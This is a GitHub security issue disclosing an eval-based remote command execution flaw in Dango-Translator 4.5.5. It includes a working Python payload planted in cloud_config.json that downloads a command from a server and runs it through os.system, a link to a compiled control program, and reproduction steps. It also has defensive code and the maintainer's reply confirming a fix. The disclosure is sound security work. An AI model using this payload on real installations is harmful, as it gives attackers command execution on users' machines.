
[Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5 #127

Closed
Leeyangee opened this issue Jul 17, 2023 · 1 comment

Leeyangee commented Jul 17, 2023

Vulnerability Product: Dango-Translator Ver4.5.5
Vulnerability version: Ver4.5.5
Vulnerability type: Hijacked Remote Command Execute
Vulnerability Details:
Vulnerability location: app/config/cloud_config.json

Without checking the xxxUse variable in app/config/cloud_config.json before eval'ing it, an unsafe config may cause Hijacked Remote Command Execute.

Client payload: "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"
Remote hijacking program: https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe
Remote hijacking program original code: https://github.com/Leeyangee/leeya_bug/tree/main/DangoTranslator_payload/testProject

PROOF:

Firstly, download Dango-Translator Ver4.5.5.
Run the program to generate the config.

Secondly, go to app/config/cloud_config.json and replace the value of xxxUse with the client payload;
here, replace "tencentwebUse": "False" with "tencentwebUse": "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"

Thirdly, download the remote hijacking program: https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe, and keep the program running.
(This is a remote hijacking program, so you can deploy it on a server, but you need to change IP_DOMAIN in the original code and the URL in the client payload, and re-compile it.)

Fourthly, run "团子翻译器.exe"; after logging in, Windows pops up a calculator (because the remote hijacking program runs the "calc" command on the client).

Once the client logs in, the remote hijacking program can detect it and run commands on the client.

This proves Hijacked Remote Command Execute.

REASON:

The client payload is divided into these parts:

The result of eval(client payload) is itself, because "tencentwebUse" will be eval'ed before exit.

Harm:

Attackers could replace the payload in order to make the client return a shell to the attackers,
so attackers could directly obtain a shell and get server permissions.

discovered by leeya_bug
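The root cause reported above is that a string taken from cloud_config.json is passed to eval(). As an added example (not Dango-Translator's own code and not the project's fix), the snippet below puts that eval pattern beside a strict parser that accepts only the two boolean literals, plus a check that lists any *Use key in an existing config whose value is no longer a boolean literal. The config shape and the "baiduwebUse" key are assumptions; only "tencentwebUse": "False" is quoted in the report.

```python
import json

# Constructed sample in the shape the report describes: each "<service>Use"
# flag is stored as the string "False"/"True". "baiduwebUse" is hypothetical.
SAMPLE_CONFIG = '{"tencentwebUse": "False", "baiduwebUse": "True", "apiKey": "x"}'
# Constructed tampered sample: the flag no longer holds a boolean literal.
TAMPERED_CONFIG = '{"tencentwebUse": "__import__(\'os\')", "baiduwebUse": "True"}'

USE_SUFFIX = "Use"
BOOL_LITERALS = {"True": True, "False": False}


def vulnerable_flags(text: str) -> dict:
    """The pattern the report describes: the flag string goes straight to
    eval(), so any Python expression stored in the file is executed.
    Kept only for contrast; never call it on a file you do not control."""
    return {k: eval(v) for k, v in json.loads(text).items() if k.endswith(USE_SUFFIX)}


def safe_flags(text: str) -> dict:
    """Hardened replacement: accept exactly True/False, reject everything else."""
    flags = {}
    for key, value in json.loads(text).items():
        if not key.endswith(USE_SUFFIX):
            continue
        if isinstance(value, bool):                              # JSON boolean
            flags[key] = value
        elif isinstance(value, str) and value in BOOL_LITERALS:  # "True"/"False"
            flags[key] = BOOL_LITERALS[value]
        else:
            raise ValueError(f"{key}: expected True/False, got {value!r}")
    return flags


def tampered_keys(text: str) -> list:
    """Defender check: *Use keys whose value is not a boolean literal, e.g. to
    audit an existing cloud_config.json before an older build would eval() it."""
    return sorted(
        k for k, v in json.loads(text).items()
        if k.endswith(USE_SUFFIX)
        and not isinstance(v, bool)
        and not (isinstance(v, str) and v in BOOL_LITERALS)
    )


if __name__ == "__main__":
    print(safe_flags(SAMPLE_CONFIG))      # {'tencentwebUse': False, 'baiduwebUse': True}
    print(tampered_keys(TAMPERED_CONFIG))  # ['tencentwebUse']
```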

@PantsuDango
Owner

Thank you very, very much for raising this security risk. It really was my oversight; I did not pay much attention to the possibility that it could be exploited.
In fact, eval is a very dangerous function, and I should avoid using it in the code as much as possible.
So I have fully adopted your suggestion and fixed every place in the code that used eval.

The related fix has been pushed in a commit.

Thank you again!
